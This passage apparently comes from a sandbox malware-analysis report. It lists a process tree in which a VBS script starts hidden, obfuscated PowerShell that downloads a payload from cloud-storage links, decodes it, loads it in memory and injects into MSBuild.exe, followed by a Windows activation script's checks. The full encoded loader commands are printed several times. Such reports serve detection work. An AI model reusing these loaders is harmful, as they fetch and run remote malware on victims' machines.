rtkstartFla'+'g.Length;rtkbase64Length = rtkendIndex - rtkstartIndex;rtkbase64Command = rtkimageText.Substring('+'rtkstartIndex, rtkbase64Length'+');rtkbas'+'e64Reversed = -join (rtk'+'base64Command.ToCharArray() RBV '+'F'+'orEach-Object { rtk_ })[-1..-(rtkbase64Command.Length)];rtkcommandBytes = [System.Convert]::FromBase64String(r'+'tkbase64Reversed);rtkloade'+'dAssembly = [System.Reflection.A'+'ssembly]::Lo'+'ad(rtkcommandBytes);rtkvaiMethod = [dnlib.IO.Home].GetMethod(4V3VAI4V3);rtkvaiMethod.Invoke(rtknull, '+'@(4V3725eacbd51f1'+'-069b-0654-a9a4-a3f821c0=nekot&aidem=tla?txt.TITSET/o/moc.topsppa.b10ae-oim-otce'+'yorp/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth4V3, 4V3desativado4V3, 4V'+'3desat'+'ivado4V3, 4V3desativado4V3, 4V3MSBuild4V3'+', 4V3desativad'+'o4V3,4V3desativado4V3,4V'+'3desativad'+'o4V3,4V'+'3URL4V3, 4V3C:bm'+'WProgramDatab'+'mW4V3,4V3carvoejar4V3,4V3vbs4V3,4'+'V314V3,4V314V3));')-cRepLAcE 'rtk',[CHar]36 -RePLACE([CHar]82+[CHar]66+[CHar]86),[CHar]124 -RePLACE ([CHar]52+[CHar]86+[CHar]51),[CHar]39-cRepLAcE ([CHar]98+[CHar]109+[CHar]87),[CHar]92) | & ( ([sTRInG]$verBOSEPREFerEnce)[1,3]+'x'-joiN'')"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of SetThreadContext
    - Suspicious use of AdjustPrivilegeToken
    PID:5068
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      PID:1400
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      System Location Discovery: System Language Discovery
      PID:5440

C:\Windows\system32\wscript.exe
wscript.exe C:\ProgramData\carvoejar.vbs
1⤵
- Blocklisted process makes network request
- Checks computer location settings
PID:3480
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgncnRraW1hZ2VVcmwgPSA0VjNodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdScrJ2M/ZXhwb3J0PWRvd25sb2FkJmlkPTFBSVYnKydnSkonKydKdjFGNnZTNHNVJysnT3libkgtc0R2VWhCWXd1cjRWMztydGt3ZWJDbGllbnQgPSBOZXctJysnT2JqZWN0IFMnKyd5c3RlbS5OZXQuV2ViQ2xpZW50O3J0a2ltYWdlQnl0ZXMgPSBydGt3ZWJDbGllbnQuRG8nKyd3bmxvYWREYXQnKydhKHJ0a2ltYWdlVXJsKTtydGtpbWFnZVRleHQgPSBbU3lzJysndGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyhydGtpbWFnZUJ5dGVzKTtydGtzdGFyJysndEZsYWcgPSA0VjM8PCcrJ0JBU0U2NF9TVEFSVD4+NFYzO3J0a2VuZEZsYWcgPSA0VjM8PEJBU0U2NF9FTkQ+PjRWMztydGtzdGFydEknKyduZGV4ID0gcnRrJysnaW1hZ2VUZXh0LkluZGV4T2YocnRrc3RhcnRGbGFnKTtydGtlbmRJbmRleCA9IHJ0a2ltYWdlVGV4dC5JbmRleE9mKHJ0a2UnKyduZEZsYWcpO3J0a3N0YScrJ3J0SW5kJysnZXggLWdlIDAgLWFuZCBydGtlbmRJbmRleCAtZ3QgcnRrc3RhcnRJbmRleDtydGtzJysndGFydEluZGV4ICs9IHJ0a3N0YXJ0RmxhJysnZy5MZW5ndGg7cnRrYmFzZTY0TGVuZ3RoID0gcnRrZW5kSW5kZXggLSBydGtzdGFydEluZGV4O3J0a2Jhc2U2NENvbW1hbmQgPSBydGtpbWFnZVRleHQuU3Vic3RyaW5nKCcrJ3J0a3N0YXJ0SW5kZXgsIHJ0a2Jhc2U2NExlbmd0aCcrJyk7cnRrYmFzJysnZTY0UmV2ZXJzZWQgPSAtam9pbiAocnRrJysnYmFzZTY0Q29tbWFuZC5Ub0NoYXJBcnJheSgpIFJCViAnKydGJysnb3JFYWNoLU9iamVjdCB7IHJ0a18gfSlbLTEuLi0ocnRrYmFzZTY0Q29tbWFuZC5MZW5ndGgpXTtydGtjb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKHInKyd0a2Jhc2U2NFJldmVyc2VkKTtydGtsb2FkZScrJ2RBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5BJysnc3NlbWJseV06OkxvJysnYWQocnRrY29tbWFuZEJ5dGVzKTtydGt2YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKDRWM1ZBSTRWMyk7cnRrdmFpTWV0aG9kLkludm9rZShydGtudWxsLCAnKydAKDRWMzcyNWVhY2JkNTFmMScrJy0wNjliLTA2NTQtYTlhNC1hM2Y4MjFjMD1uZWtvdCZhaWRlbT10bGE/dHh0LlRJVFNFVC9vL21vYy50b3BzcHBhLmIxMGFlLW9pbS1vdGNlJysneW9ycC9iLzB2L21vYy5zaXBhZWxnb29nLmVnYXJvdHNlc2FiZXJpZi8vOnNwdHRoNFYzLCA0VjNkZXNhdGl2YWRvNFYzLCA0VicrJzNkZXNhdCcrJ2l2YWRvNFYzLCA0VjNkZXNhdGl2YWRvNFYzLCA0VjNNU0J1aWxkNFYzJysnLCA0VjNkZXNhdGl2YWQnKydvNFYzLDRWM2Rlc2F0aXZhZG80VjMsNFYnKyczZGVzYXRpdmFkJysnbzRWMyw0VicrJzNVUkw0VjMsIDRWM0M6Ym0nKydXUHJvZ3JhbURhdGFiJysnbVc0VjMsNFYzY2Fydm9lamFyNFYzLDRWM3ZiczRWMyw0JysnVjMxNFYzLDRWMzE0VjMpKTsnKS1jUmVwTEFjRSAgJ3J0aycsW0NIYXJdMzYgIC1SZVBMQUNFKFtDSGFyXTgyK1tDSGFyXTY2K1tDSGFyXTg2KSxbQ0hhcl0xMjQgLVJlUExBQ0UgKFtDSGFyXTUyK1tDSGFyXTg2K1tDSGFyXTUxKSxbQ0hhcl0zOS1jUmVwTEFjRSAgKFtDSGFyXTk4K1tDSGFyXTEwOStbQ0hhcl04NyksW0NIYXJdOTIpIHwgJiAoIChbc1RSSW5HXSR2ZXJCT1NFUFJFRmVyRW5jZSlbMSwzXSsneCctam9pTicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of AdjustPrivilegeToken
  PID:3824
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('rtkimageUrl = 4V3https://drive.google.com/u'+'c?export=download&id=1AIV'+'gJJ'+'Jv1F6vS4sU'+'OybnH-sDvUhBYwur4V3;rtkwebClient = New-'+'Object S'+'ystem.Net.WebClient;rtkimageBytes = rtkwebClient.Do'+'wnloadDat'+'a(rtkimageUrl);rtkimageText = [Sys'+'tem.Text.Encoding]::UTF8.GetString(rtkimageBytes);rtkstar'+'tFlag = 4V3<<'+'BASE64_START>>4V3;rtkendFlag = 4V3<<BASE64_END>>4V3;rtkstartI'+'ndex = rtk'+'imageText.IndexOf(rtkstartFlag);rtkendIndex = rtkimageText.IndexOf(rtke'+'ndFlag);rtksta'+'rtInd'+'ex -ge 0 -and rtkendIndex -gt rtkstartIndex;rtks'+'tartIndex += rtkstartFla'+'g.Length;rtkbase64Length = rtkendIndex - rtkstartIndex;rtkbase64Command = rtkimageText.Substring('+'rtkstartIndex, rtkbase64Length'+');rtkbas'+'e64Reversed = -join (rtk'+'base64Command.ToCharArray() RBV '+'F'+'orEach-Object { rtk_ })[-1..-(rtkbase64Command.Length)];rtkcommandBytes = [System.Convert]::FromBase64String(r'+'tkbase64Reversed);rtkloade'+'dAssembly = [System.Reflection.A'+'ssembly]::Lo'+'ad(rtkcommandBytes);rtkvaiMethod = [dnlib.IO.Home].GetMethod(4V3VAI4V3);rtkvaiMethod.Invoke(rtknull, '+'@(4V3725eacbd51f1'+'-069b-0654-a9a4-a3f821c0=nekot&aidem=tla?txt.TITSET/o/moc.topsppa.b10ae-oim-otce'+'yorp/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth4V3, 4V3desativado4V3, 4V'+'3desat'+'ivado4V3, 4V3desativado4V3, 4V3MSBuild4V3'+', 4V3desativad'+'o4V3,4V3desativado4V3,4V'+'3desativad'+'o4V3,4V'+'3URL4V3, 4V3C:bm'+'WProgramDatab'+'mW4V3,4V3carvoejar4V3,4V3vbs4V3,4'+'V314V3,4V314V3));')-cRepLAcE 'rtk',[CHar]36 -RePLACE([CHar]82+[CHar]66+[CHar]86),[CHar]124 -RePLACE ([CHar]52+[CHar]86+[CHar]51),[CHar]39-cRepLAcE ([CHar]98+[CHar]109+[CHar]87),[CHar]92) | & ( ([sTRInG]$verBOSEPREFerEnce)[1,3]+'x'-joiN'')"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of SetThreadContext
    - Suspicious use of AdjustPrivilegeToken
    PID:1832
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      PID:5068
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      System Location Discovery: System Language Discovery
      PID:2780

C:\Windows\system32\wscript.exe
wscript.exe C:\ProgramData\carvoejar.vbs
1⤵
- Checks computer location settings
PID:5160
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgncnRraW1hZ2VVcmwgPSA0VjNodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdScrJ2M/ZXhwb3J0PWRvd25sb2FkJmlkPTFBSVYnKydnSkonKydKdjFGNnZTNHNVJysnT3libkgtc0R2VWhCWXd1cjRWMztydGt3ZWJDbGllbnQgPSBOZXctJysnT2JqZWN0IFMnKyd5c3RlbS5OZXQuV2ViQ2xpZW50O3J0a2ltYWdlQnl0ZXMgPSBydGt3ZWJDbGllbnQuRG8nKyd3bmxvYWREYXQnKydhKHJ0a2ltYWdlVXJsKTtydGtpbWFnZVRleHQgPSBbU3lzJysndGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyhydGtpbWFnZUJ5dGVzKTtydGtzdGFyJysndEZsYWcgPSA0VjM8PCcrJ0JBU0U2NF9TVEFSVD4+NFYzO3J0a2VuZEZsYWcgPSA0VjM8PEJBU0U2NF9FTkQ+PjRWMztydGtzdGFydEknKyduZGV4ID0gcnRrJysnaW1hZ2VUZXh0LkluZGV4T2YocnRrc3RhcnRGbGFnKTtydGtlbmRJbmRleCA9IHJ0a2ltYWdlVGV4dC5JbmRleE9mKHJ0a2UnKyduZEZsYWcpO3J0a3N0YScrJ3J0SW5kJysnZXggLWdlIDAgLWFuZCBydGtlbmRJbmRleCAtZ3QgcnRrc3RhcnRJbmRleDtydGtzJysndGFydEluZGV4ICs9IHJ0a3N0YXJ0RmxhJysnZy5MZW5ndGg7cnRrYmFzZTY0TGVuZ3RoID0gcnRrZW5kSW5kZXggLSBydGtzdGFydEluZGV4O3J0a2Jhc2U2NENvbW1hbmQgPSBydGtpbWFnZVRleHQuU3Vic3RyaW5nKCcrJ3J0a3N0YXJ0SW5kZXgsIHJ0a2Jhc2U2NExlbmd0aCcrJyk7cnRrYmFzJysnZTY0UmV2ZXJzZWQgPSAtam9pbiAocnRrJysnYmFzZTY0Q29tbWFuZC5Ub0NoYXJBcnJheSgpIFJCViAnKydGJysnb3JFYWNoLU9iamVjdCB7IHJ0a18gfSlbLTEuLi0ocnRrYmFzZTY0Q29tbWFuZC5MZW5ndGgpXTtydGtjb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKHInKyd0a2Jhc2U2NFJldmVyc2VkKTtydGtsb2FkZScrJ2RBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5BJysnc3NlbWJseV06OkxvJysnYWQocnRrY29tbWFuZEJ5dGVzKTtydGt2YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKDRWM1ZBSTRWMyk7cnRrdmFpTWV0aG9kLkludm9rZShydGtudWxsLCAnKydAKDRWMzcyNWVhY2JkNTFmMScrJy0wNjliLTA2NTQtYTlhNC1hM2Y4MjFjMD1uZWtvdCZhaWRlbT10bGE/dHh0LlRJVFNFVC9vL21vYy50b3BzcHBhLmIxMGFlLW9pbS1vdGNlJysneW9ycC9iLzB2L21vYy5zaXBhZWxnb29nLmVnYXJvdHNlc2FiZXJpZi8vOnNwdHRoNFYzLCA0VjNkZXNhdGl2YWRvNFYzLCA0VicrJzNkZXNhdCcrJ2l2YWRvNFYzLCA0VjNkZXNhdGl2YWRvNFYzLCA0VjNNU0J1aWxkNFYzJysnLCA0VjNkZXNhdGl2YWQnKydvNFYzLDRWM2Rlc2F0aXZhZG80VjMsNFYnKyczZGVzYXRpdmFkJysnbzRWMyw0VicrJzNVUkw0VjMsIDRWM0M6Ym0nKydXUHJvZ3JhbURhdGFiJysnbVc0VjMsNFYzY2Fydm9lamFyNFYzLDRWM3ZiczRWMyw0JysnVjMxNFYzLDRWMzE0VjMpKTsnKS1jUmVwTEFjRSAgJ3J0aycsW0NIYXJdMzYgIC1SZVBMQUNFKFtDSGFyXTgyK1tDSGFyXTY2K1tDSGFyXTg2KSxbQ0hhcl0xMjQgLVJlUExBQ0UgKFtDSGFyXTUyK1tDSGFyXTg2K1tDSGFyXTUxKSxbQ0hhcl0zOS1jUmVwTEFjRSAgKFtDSGFyXTk4K1tDSGFyXTEwOStbQ0hhcl04NyksW0NIYXJdOTIpIHwgJiAoIChbc1RSSW5HXSR2ZXJCT1NFUFJFRmVyRW5jZSlbMSwzXSsneCctam9pTicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of AdjustPrivilegeToken
  PID:896
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('rtkimageUrl = 4V3https://drive.google.com/u'+'c?export=download&id=1AIV'+'gJJ'+'Jv1F6vS4sU'+'OybnH-sDvUhBYwur4V3;rtkwebClient = New-'+'Object S'+'ystem.Net.WebClient;rtkimageBytes = rtkwebClient.Do'+'wnloadDat'+'a(rtkimageUrl);rtkimageText = [Sys'+'tem.Text.Encoding]::UTF8.GetString(rtkimageBytes);rtkstar'+'tFlag = 4V3<<'+'BASE64_START>>4V3;rtkendFlag = 4V3<<BASE64_END>>4V3;rtkstartI'+'ndex = rtk'+'imageText.IndexOf(rtkstartFlag);rtkendIndex = rtkimageText.IndexOf(rtke'+'ndFlag);rtksta'+'rtInd'+'ex -ge 0 -and rtkendIndex -gt rtkstartIndex;rtks'+'tartIndex += rtkstartFla'+'g.Length;rtkbase64Length = rtkendIndex - rtkstartIndex;rtkbase64Command = rtkimageText.Substring('+'rtkstartIndex, rtkbase64Length'+');rtkbas'+'e64Reversed = -join (rtk'+'base64Command.ToCharArray() RBV '+'F'+'orEach-Object { rtk_ })[-1..-(rtkbase64Command.Length)];rtkcommandBytes = [System.Convert]::FromBase64String(r'+'tkbase64Reversed);rtkloade'+'dAssembly = [System.Reflection.A'+'ssembly]::Lo'+'ad(rtkcommandBytes);rtkvaiMethod = [dnlib.IO.Home].GetMethod(4V3VAI4V3);rtkvaiMethod.Invoke(rtknull, '+'@(4V3725eacbd51f1'+'-069b-0654-a9a4-a3f821c0=nekot&aidem=tla?txt.TITSET/o/moc.topsppa.b10ae-oim-otce'+'yorp/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth4V3, 4V3desativado4V3, 4V'+'3desat'+'ivado4V3, 4V3desativado4V3, 4V3MSBuild4V3'+', 4V3desativad'+'o4V3,4V3desativado4V3,4V'+'3desativad'+'o4V3,4V'+'3URL4V3, 4V3C:bm'+'WProgramDatab'+'mW4V3,4V3carvoejar4V3,4V3vbs4V3,4'+'V314V3,4V314V3));')-cRepLAcE 'rtk',[CHar]36 -RePLACE([CHar]82+[CHar]66+[CHar]86),[CHar]124 -RePLACE ([CHar]52+[CHar]86+[CHar]51),[CHar]39-cRepLAcE ([CHar]98+[CHar]109+[CHar]87),[CHar]92) | & ( ([sTRInG]$verBOSEPREFerEnce)[1,3]+'x'-joiN'')"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of SetThreadContext
    - Suspicious use of AdjustPrivilegeToken
    PID:6088
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      System Location Discovery: System Language Discovery
      PID:5124

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4328
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /c ""C:\Windows\Temp\MAS_441363ff-a18a-4456-a22d-2c94fed2552c.cmd" "
  2⤵
  PID:5488
- - C:\Windows\System32\sc.exe
    sc query Null
    3⤵
    - Launches sc.exe
    PID:4576
- - C:\Windows\System32\find.exe
    find /i "RUNNING"
    3⤵
    PID:6040
- - C:\Windows\System32\findstr.exe
    findstr /v "$" "MAS_441363ff-a18a-4456-a22d-2c94fed2552c.cmd"
    3⤵
    PID:6068
- - C:\Windows\System32\cmd.exe
    C:\Windows\System32\cmd.exe /c ver
    3⤵
    PID:1840
- - C:\Windows\System32\reg.exe
    reg query "HKCU\Console" /v ForceV2
    3⤵
    PID:5564
- - C:\Windows\System32\find.exe
    find /i "0x0"
    3⤵
    PID:5064
- - C:\Windows\System32\cmd.exe
    C:\Windows\System32\cmd.exe /c echo prompt $E | cmd
    3⤵
    PID:2652
  - - C:\Windows\System32\cmd.exe
      C:\Windows\System32\cmd.exe /S /D /c" echo prompt $E "
      4⤵
      PID:6116
  - - C:\Windows\System32\cmd.exe
      cmd
      4⤵
      PID:4820
- - C:\Windows\System32\cmd.exe
    C:\Windows\System32\cmd.exe /S /D /c" echo "C:\Windows\Temp\MAS_441363ff-a18a-4456-a22d-2c94fed2552c.cmd" "
    3⤵
    PID:2796
- - C:\Windows\System32\find.exe
    find /i "C:\Users\Admin\AppData\Local\Temp"
    3⤵
    PID:1868
- - C:\Windows\System32\cmd.exe
    cmd /c "powershell.exe "$f=[io.file]::ReadAllText('C:\Windows\Temp\MAS_441363ff-a18a-4456-a22d-2c94fed2552c.cmd') -split ':PowerShellTest:\s*';iex ($f[1])""
    3⤵
    PID:3224
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe "$f=[io.file]::ReadAllText('C:\Windows\Temp\MAS_441363ff-a18a-4456-a22d-2c94fed2552c.cmd') -split ':PowerShellTest:\s*';iex ($f[1])"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious use of AdjustPrivilegeToken
      PID:2384
- - C:\Windows\System32\find.exe
    find /i "FullLanguage"
    3⤵
    PID:1156
- - C:\Windows\System32\fltMC.exe
    fltmc
    3⤵
    PID:5140
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe "$TB = [AppDomain]::CurrentDomain.DefineDynamicAssembly(4, 1).DefineDynamicModule(2, $False).DefineType(0); [void]$TB.DefinePInvokeMethod('GetConsoleWindow', 'kernel32.dll', 22, 1, [IntPtr], @(), 1, 3).SetImplementationFlags(128); [void]$TB.DefinePInvokeMethod('SendMessageW', 'user32.dll', 22, 1, [IntPtr], @([IntPtr], [UInt32], [IntPtr], [IntPtr]), 1, 3).SetImplementationFlags(128); $hIcon = $TB.CreateType(); $hWnd = $hIcon::GetConsoleWindow(); echo $($hIcon::SendMessageW($hWnd, 127, 0, 0) -ne [IntPtr]::Zero);"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of AdjustPrivilegeToken
    PID:5712
- - C:\Windows\System32\find.exe
    find /i "True"
    3⤵
    PID:3484
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe "$t=[AppDomain]::CurrentDomain.DefineDynamicAssembly(4, 1).DefineDynamicModule(2, $False).DefineType(0); $t.DefinePInvokeMethod('GetStdHandle', 'kernel32.dll', 22, 1, [IntPtr], @([Int32]), 1, 3).SetImplementationFlags(128); $t.DefinePInvokeMethod('SetConsoleMode', 'kernel32.dll', 22, 1, [Boolean], @([IntPtr], [Int32]), 1, 3).SetImplementationFlags(128); $k=$t.CreateType(); $b=$k::SetConsoleMode($k::GetStdHandle(-10), 0x0080); & cmd.exe '/c' '"""C:\Windows\Temp\MAS_441363ff-a18a-4456-a22d-2c94fed2552c.cmd""" -el -qedit'"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of AdjustPrivilegeToken
    PID:4104
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c ""C:\Windows\Temp\MAS_441363ff-a18a-4456-a22d-2c94fed2552c.cmd" -el -qedit"
      4⤵
      PID:5020
    - - C:\Windows\System32\sc.exe
        
        sc query Null
        5⤵
        Launches sc.exe
        
        PID:4620
    - - C:\Windows\System32\find.exe
        
        find /i "RUNNING"
        5⤵
        
        PID:5048
    - - C:\Windows\System32\findstr.exe
        
        findstr /v "$" "MAS_441363ff-a18a-4456-a22d-2c94fed2552c.cmd"
        5⤵
        
        PID:3256
    - - C:\Windows\System32\cmd.exe
        
        C:\Windows\System32\cmd.exe /S /D /c" echo "-el -qedit" "
        5⤵
        
        PID:2056
    - - C:\Windows\System32\find.exe
        
        find /i "/"
        5⤵
        
        PID:2920
    - - C:\Windows\System32\cmd.exe
        
        C:\Windows\System32\cmd.exe /c ver
        5⤵
        
        PID:4612
    - - C:\Windows\System32\reg.exe
        
        reg query "HKCU\Console" /v ForceV2
        5⤵
        
        PID:5584
    - - C:\Windows\System32\find.exe
        
        find /i "0x0"
        5⤵
        
        PID:4000
    - - C:\Windows\System32\cmd.exe
        
        C:\Windows\System32\cmd.exe /c echo prompt $E | cmd
        5⤵
        
        PID:2116
      - C:\Windows\System32\cmd.exe
        
        C:\Windows\System32\cmd.exe /S /D /c" echo prompt $E "
        6⤵
        
        PID:4424
      - C:\Windows\System32\cmd.exe
        
        cmd
        6⤵
        
        PID:4056
    - - C:\Windows\System32\cmd.exe
        
        C:\Windows\System32\cmd.exe /S /D /c" echo "C:\Windows\Temp\MAS_441363ff-a18a-4456-a22d-2c94fed2552c.cmd" "
        5⤵
        
        PID:4492
    - - C:\Windows\System32\find.exe
        
        find /i "C:\Users\Admin\AppData\Local\Temp"
        5⤵
        
        PID:2440
    - - C:\Windows\System32\cmd.exe
        
        cmd /c "powershell.exe "$f=[io.file]::ReadAllText('C:\Windows\Temp\MAS_441363ff-a18a-4456-a22d-2c94fed2552c.cmd') -split ':PowerShellTest:\s*';iex ($f[1])""
        5⤵
        
        PID:5772
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe "$f=[io.file]::ReadAllText('C:\Windows\Temp\MAS_441363ff-a18a-4456-a22d-2c94fed2552c.cmd') -split ':PowerShellTest:\s*';iex ($f[1])"
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:5412
    - - C:\Windows\System32\find.exe
        
        find /i "FullLanguage"
        5⤵
        
        PID:5560
    - - C:\Windows\System32\fltMC.exe
        
        fltmc
        5⤵
        
        PID:1276
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe "$TB = [AppDomain]::CurrentDomain.DefineDynamicAssembly(4, 1).DefineDynamicModule(2, $False).DefineType(0); [void]$TB.DefinePInvokeMethod('GetConsoleWindow', 'kernel32.dll', 22, 1, [IntPtr], @(), 1, 3).SetImplementationFlags(128); [void]$TB.DefinePInvokeMethod('SendMessageW', 'user32.dll', 22, 1, [IntPtr], @([IntPtr], [UInt32], [IntPtr], [IntPtr]), 1, 3).SetImplementationFlags(128); $hIcon = $TB.CreateType(); $hWnd = $hIcon::GetConsoleWindow(); echo $($hIcon::SendMessageW($hWnd, 127, 0, 0) -ne [IntPtr]::Zero);"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:4452
    - - C:\Windows\System32\find.exe
        
        find /i "True"
        5⤵
        
        PID:1620
    - - C:\Windows\System32\cmd.exe
        
        C:\Windows\System32\cmd.exe /c ping -4 -n 1 updatecheck.massgrave.dev
        5⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:5600
      - C:\Windows\System32\PING.EXE
        
        ping -4 -n 1 updatecheck.massgrave.dev
        6⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:4288
    - - C:\Windows\System32\cmd.exe
        
        C:\Windows\System32\cmd.exe /S /D /c" echo "127.69.2.7" "
        5⤵
        
        PID:2736
    - - C:\Windows\System32\find.exe
        
        find "127.69"
        5⤵
        
        PID:6052
    - - C:\Windows\System32\cmd.exe
        
        C:\Windows\System32\cmd.exe /S /D /c" echo "127.69.2.7" "
        5⤵
        
        PID:4796
    - - C:\Windows\System32\find.exe
        
        find "127.69.2.7"
        5⤵
        
        PID:5368
    - - C:\Windows\System32\cmd.exe
        
        C:\Windows\System32\cmd.exe /S /D /c" echo "-el -qedit" "
        5⤵
        
        PID:5520
    - - C:\Windows\System32\find.exe
        
        find /i "/S"
        5⤵
        
        PID:4316
    - - C:\Windows\System32\cmd.exe
        
        C:\Windows\System32\cmd.exe /S /D /c" echo "-el -qedit" "
        5⤵
        
        PID:2512
    - - C:\Windows\System32\find.exe
        
        find /i "/"
        5⤵
        
        PID:4676
    - - C:\Windows\System32\cmd.exe
        
        C:\Windows\System32\cmd.exe /c reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /v Desktop
        5⤵
        
        PID:4384
      - C:\Windows\System32\reg.exe
        
        reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /v Desktop
        6⤵
        
        PID:216
    - - C:\Windows\System32\mode.com
        
        mode 76, 33
        5⤵
        
        PID:112
    - - C:\Windows\System32\choice.exe
        
        choice /C:123456789H0 /N
        5⤵
        
        PID:4872
    - - C:\Windows\System32\mode.com
        
        mode 110, 34
        5⤵
        
        PID:2544
    - - C:\Windows\System32\reg.exe
        
        reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\taskcache\tasks" /f Path /s
        5⤵
        
        PID:1556
    - - C:\Windows\System32\find.exe
        
        find /i "AutoPico"
        5⤵
        
        PID:1640
    - - C:\Windows\System32\reg.exe
        
        reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\taskcache\tasks" /f Path /s
        5⤵
        
        PID:5464
    - - C:\Windows\System32\find.exe
        
        find /i "R@1n"
        5⤵
        
        PID:5556
    - - C:\Windows\System32\find.exe
        
        find /i "avira.com" C:\Windows\System32\drivers\etc\hosts
        5⤵
        
        PID:4584
    - - C:\Windows\System32\find.exe
        
        find /i "kaspersky.com" C:\Windows\System32\drivers\etc\hosts
        5⤵
        
        PID:4640
    - - C:\Windows\System32\find.exe
        
        find /i "virustotal.com" C:\Windows\System32\drivers\etc\hosts
        5⤵
        
        PID:3960
    - - C:\Windows\System32\find.exe
        
        find /i "mcafee.com" C:\Windows\System32\drivers\etc\hosts
        5⤵
        
        PID:4556
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /v DependOnService
        5⤵
        Modifies registry key
        
        PID:2528
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /v Description
        5⤵
        Modifies registry key
        
        PID:3264
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /v DisplayName
        5⤵
        Modifies registry key
        
        PID:4964
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /v ErrorControl
        5⤵
        Modifies registry key
        
        PID:4732
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /v ImagePath
        5⤵
        Modifies registry key
        
        PID:5372
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /v ObjectName
        5⤵
        Modifies registry key
        
        PID:2300
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /v Start
        5⤵
